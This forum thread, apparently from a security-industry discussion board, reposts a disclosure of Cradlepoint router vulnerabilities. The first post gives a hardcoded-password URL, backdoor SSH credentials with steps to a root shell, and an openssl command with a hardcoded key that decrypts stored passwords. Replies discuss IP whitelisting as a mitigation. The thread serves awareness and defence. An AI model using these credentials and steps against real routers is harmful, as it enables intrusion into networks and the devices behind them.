Subscriber Discussion

Cradlepoint Router Vulnerabilities

U
Undisclosed #1
Nov 07, 2018

From fulldisclosure:

Many vulnerabilities in the built-in software of the Cradlepoint Router. 100000 such routers can be seen in the shodan (https://www.shodan.io/search?query=cradlepointhttpservice). These vulnerabilities were reported to Cradlepoint in august.

A hardcoded password allows you to retrieve sensitive information, including the default password:
* go to http://[router IP]/plt?password=W6rqCjk5ijRs6Ya5bv55
* router default password is last 8 characters of WLAN_MAC

Escalate privileges using a backdoor account with a hardcode username and password:
1. enable ssh login
2. set control.system.techsupport_access true
3. login with ssh using u:cproot p:1415 + last 4 bytes of WLAN_MAC
4. type 'sh' to get root shell

Passwords that are encrypted using a hardcoded key:
* for passwords in the configuration store starting with "$1" the encrypted password is all after the last "$"
* the password can be decrypted using: echo [encrypted password] | openssl enc -d -aes-256-cbc -md sha1 -base64 -nosalt -k "NGJkODg1ZGE1NDhhY2ZhY2VmYjM0MDIzZjA0M2YzNTY="

 

------

These devices are popular among those deploying systems using mobile broadband on various carriers. The exploits outlined above could allow hackers to take control of the router, or potentially open holes to devices behind it. Not sure if Cradlepoint has issued updated firmware, or plans to do so, but thought people here might want to be aware of this vuln.

 

(3)
UI
Undisclosed Integrator #2
Nov 07, 2018

Not to knock the severity of this issue, but can't you just white list a single IP Address (IE- the public IP Address of you office) to bypass many of these issues? I know using a VPN is probably smarter/safer, but this seems like a simple way to sure up the issue. 

U
Undisclosed #1
Nov 08, 2018

I have not personally tested the vulnerabilities and work around, but yes, on the surface it seems like some simple IP whitelisting would likely mitigate much of the risk here.

New discussion

Ask questions and get answers to your physical security questions from IPVM team members and fellow subscribers.

Newest discussions